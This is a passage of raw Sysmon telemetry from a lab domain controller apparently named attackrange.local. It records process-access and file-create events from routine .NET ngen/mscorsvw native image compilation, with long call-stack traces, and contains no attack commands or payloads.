.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006740Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:33.562{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9175-6005-8B02-00000000A301}748C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006739Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:33.546{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9175-6005-8B02-00000000A301}748C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006738Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:33.546{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9175-6005-8B02-00000000A301}748C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+8
4d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006737Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:33.484{59A5CD1D-9175-6005-8A02-00000000A301}5008C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1390-0\System.Management.Instrumentation.dll2021-01-18 13:47:33.484 10341000x80000000000000006736Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:33.202{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9175-6005-8A02-00000000A301}5008C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006735Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:33.202{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9175-6005-8A02-00000000A301}5008C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006734Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:33.202{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9175-6005-8A02-00000000A301}5008C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006733Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:33.140{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9175-6005-8902-00000000A301}4168C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006732Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:33.124{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9175-6005-8902-00000000A301}4168C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006731Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:33.124{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9175-6005-8902-00000000A301}4168C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006765Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:34.968{59A5CD1D-9176-6005-9202-00000000A301}3416C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\d58-0\System.Numerics.dll2021-01-18 13:47:34.968 10341000x80000000000000006764Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:34.749{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9176-6005-9202-00000000A301}3416C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006763Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:34.749{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9176-6005-9202-00000000A301}3416C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006762Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:34.749{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9176-6005-9202-00000000A301}3416C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006761Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:34.718{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9176-6005-9102-00000000A301}1336C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006760Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:34.718{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9176-6005-9102-00000000A301}1336C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006759Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:34.718{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9176-6005-9102-00000000A301}1336C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006758Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:34.655{59A5CD1D-9176-6005-9002-00000000A301}4672C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1240-0\System.Net.Http.WebRequest.dll2021-01-18 13:47:34.655 10341000x80000000000000006757Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:34.624{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9176-6005-9002-00000000A301}4672C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006756Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:34.624{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9176-6005-9002-00000000A301}4672C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006755Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:34.624{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9176-6005-9002-00000000A301}4672C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006754Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:34.577{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9176-6005-8F02-00000000A301}3048C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006753Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:34.562{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9176-6005-8F02-00000000A301}3048C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006752Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:34.562{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9176-6005-8F02-00000000A301}3048C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006751Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:34.499{59A5CD1D-9176-6005-8E02-00000000A301}728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\2d8-0\System.Net.dll2021-01-18 13:47:34.499 10341000x80000000000000006750Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:34.187{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9176-6005-8E02-00000000A301}728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006749Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:34.171{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9176-6005-8E02-00000000A301}728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006748Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:34.171{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9176-6005-8E02-00000000A301}728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006747Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 